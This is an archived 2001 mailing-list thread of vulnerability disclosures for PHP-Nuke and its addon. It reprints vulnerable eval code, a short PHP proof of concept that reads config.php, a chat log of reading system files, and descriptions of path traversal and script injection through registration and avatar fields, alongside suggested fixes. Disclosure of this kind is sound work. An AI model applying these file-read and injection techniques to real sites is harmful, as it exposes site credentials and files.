i dont find it a serious bug... they can just ruin their details page... so who cares...however if u want a serious bug of php nuke... well there is one that allows to read any file on the sytem look at: http://www.twlc.net/article.php?sid=318 Mauro. admin of twlc dot net bug in nuke addon@#! DANGEROUS++!!! Posted on Friday, July 13 @ 19:53:31 CDT topic: advisories Evening everyone.. Sorry to tell you: php nuke addon is BUGGY. it got a *HUGE* bug that allows reading of every file on the system. let me explain you the bug... To do active forums and shit like that the author had to put: echo "<tr valign="top"><td bgcolor="#ffffff"> "; if (file_exists($content)) { $fp = fopen ($content, "r"); $content = fread($fp, filesize($content)); fclose ($fp); $content = "?>$content<?"; echo eval($content); } else { echo $content; } echo "</td></tr></table> "; replacing ."<tr valign="top"><td bgcolor="#ffffff"> " ."$content " ."</td></tr></table> " ON EACH THEME file... so what this code does? it check the content of the block and if this is a file it 'executes' it ... now i was like 'and if i put something like this' <?php $db = "config.php"; $fdb = @file($db); $ldb = count($fdb); while ($ldb>=0){ echo $fdb [$ldb]; $ldb--; }; ?> (sorry for the code, but i am not a php guru:P) and name it to exploit.php and put it in the main directory? it simply allowed me to read config.php but a friend of mine (shockzor THANK YOU BRO) told me "who could put a file like that on ur webserver" (i didnt made the test to upload it on my anonymous ftp but i think it could work:)) but thats just a possibility that this routine gives to you cus i went ahead doing these tests and and i found that this SIMPLY ALLOWS ANY FILE READING ON THE SYSTEM LOOK: (sg|code) u got autoexec.bat under c: ? (shockzor) no (shockzor) autoexec.nt (sg|code) good (sg|code) Menu for shit <sg|code> (sg|code) lh %SystemRoot%system32mscdexnt.exe lh %SystemRoot%system32 edir lh %SystemRoot%system32dosx (sg|code) now (sg|code) since i am (sg|code) 31337 (sg|code) WHAT? (sg|code) EHEH (shockzor) i dont think you can get out of the www root (sg|code) u think wrong (sg|code) cus i just did well u got to fixes: 1) bring back your themes file to: ."<tr valign="top"><td bgcolor="#ffffff"> " ."$content " ."</td></tr></table> " 2) get user.php go at the end of the file where there is: switch($op) { look down since you find case "edithome": edithome(); break; case "savehome": savehome($uid, $uname, $theme, $storynum, $ublockon, $ublock); break; remove this shit so users cant create their "home menu" thanks for the attention. btw i would like to thank shockzor that helped me making the tests! thanks bro..!:D thanks also goes out to all in #twlc on undernet peace out (thanks goes out also to the authors of php nuke and php nuke addon, i run em and i like em a lot ! keep up the good work) Mauro aka supergate rootat_private http://www.twlc.net the following text has been posted to http://www.twlc.net http://www.phpnuke.org http://www.nukeaddon.com ----- Original Message ----- From: "MegaHz" <costconat_private> To: <VULN-DEVat_private>; <INCIDENTSat_private>; <bugtraqat_private> Cc: <mc2at_private> Sent: Friday, July 27, 2001 4:41 PM Subject: SERIOUS BUG IN PHPNUKE > Yes, phpnuke.org, was contacted.... > > First take a look at: > http://phpnuke.org/user.php?op=userinfo&uname=MegaHz > > > Then, read this................. > PHPnuke Bugs. > > After testing just a few scripts on phpnuke I have noticed the following: > > Some fields in the registration form allow code > and fail to filter out the tags. > e.g Interests: src=http://www.anything.com/defaced.gif> > > Also when faking a form and posting from local file (user.php.html) > after editing a few fields like the avatar picture for example, > it is possible to escape surtain dirs with the ../../../../dir/pic.gif > in the options field. > > (-- This is a local html file and set to post to user.php on the target > server --) > (no this is not a tag :P ) > > > 001.gif > 002.gif > > > > This tells user.php to save the avatar path as > http://www.target.com/../../../dir_on_server/anyfile.ext and loads the file > when the user info of the attacker is viewed. > > As we know webbugs (invisible or visible pics can be used for tracing) > > The preview of the Registration Form allows Javascript in the > body. (not the user.php) but it does not allow ' or " . BUT you can user / > instead of ' > so this helps to will in variables in javascript. > > This can damage the site and make it look ugly. > > I coulnt be bothered to look at the rest of phpnuke... > > > Tested on phpnuke v5.0 > > Firstly discovered by: dinopio > > > > ================================================= > Andreas Constantinides (MegaHz) > Owner - Admin of cHp - http://www.cyhackportal.com > megahzat_private > ICQ#: 30136845 > =================================================
This archive was generated by hypermail 2b30 : Fri Jul 27 2001 - 14:40:29 PDT